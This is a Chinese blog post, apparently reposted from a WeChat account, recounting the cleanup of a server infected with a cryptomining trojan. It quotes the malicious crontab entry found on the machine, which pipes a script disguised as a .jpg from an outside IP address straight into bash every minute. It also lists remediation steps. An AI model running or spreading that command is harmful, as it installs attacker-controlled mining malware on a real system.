记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理

admin 2024年2月28日10:48:42评论24 views字数 791阅读2分38秒阅读模式

    XX酒业服务器用的是本地化机房部署,完美运行着Tomcat,MySQL,SQLserver2014等程序。

      系统为php语言编写的自建WEB业务程序,网络前端部署一台某公司防火墙,但是没有对这个业务系统做配置,上个月网站不能访问了!

      立即远程打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接被killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。打开某公司防火墙启动相关策略并打开日志记录发现存在僵尸网络,由于服务器采用双IP的部署方式,果断通过防火墙对该服务器IP进行封锁。进行下一步处置。

记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理

一、在服务器运行机制中打了个top,出现以下内容:

记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理

由于无法确定只有先杀掉Tomcat等程序启动不了的元凶。然而并没有什么用,过一会再看那个东西又跑出来占cpu。怀疑是个定时任务。通过查询发现URL地址任务。判断是伪装,crul过去是下面的脚本,确定过程在挖矿

【Lroot@JZZweb~】# crontab -[
* * * * * curl -s http://192.99.142.235:8220/Iogo3.jpg | bash -s

二、所以决定执行以下步骤:杀掉存放目录:

记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理

记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理

三、进入临时目录:

记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理

四、发现配置文件

记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理后台删除两个目录后再查看TOP已经清除掉了。

五、处理思路:

1.找到寄生的目录,一般都会在tmp里,我这个是在/var/tmp/。首先把crontab干掉,杀掉进程,再删除产生的文件。

2.启动Tomcat等程序,修复漏洞,防止杀掉进程删掉文件后,黑客后门进来history一敲

3.后续工作:

(1)把所有软件升级到新版本

(2)修改所有软件默认端口号

(3)打开ssh/authorized_keys, 删除不认识的密钥

(4)删除用户列表中陌生的帐号

原文始发于微信公众号(菜鸟小新):记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月28日10:48:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理http://cn-sec.com/archives/2532525.html

发表评论

匿名网友 填写信息